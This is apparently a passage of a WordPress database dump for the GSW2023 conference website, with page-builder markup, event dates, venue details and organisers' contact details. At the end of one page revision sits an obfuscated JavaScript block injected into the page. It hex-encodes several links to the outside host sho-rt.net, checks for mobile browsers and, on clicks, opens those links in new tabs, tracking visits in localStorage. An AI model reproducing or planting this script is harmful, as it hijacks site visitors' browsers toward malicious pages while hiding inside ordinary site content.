00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 19:52:49','2023-08-13 19:52:49','',3066,'https://gsw2023.com/?p=5156',0,'revision','',0),
(5157,1,'2023-08-13 20:00:37','2023-08-13 20:00:37','','main_u5','','inherit','open','closed','','main_u5-5','','','2023-08-13 20:00:37','2023-08-13 20:00:37','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u5-4.jpg',0,'attachment','image/jpeg',0),
(5158,1,'2023-09-06 06:19:47','2023-09-06 06:19:47','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\nVice President for Post Graduate and Scientific Research\nArab Academy for Science, Technology and Maritime Transport\nP.O.Box 1029, Alexandria, Egypt\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\n</tr>\n</tbody>\n</table>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1 alignnone wp-image-5160\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"106\" height=\"150\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\n</tr>\n</tbody>\n</table>\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" 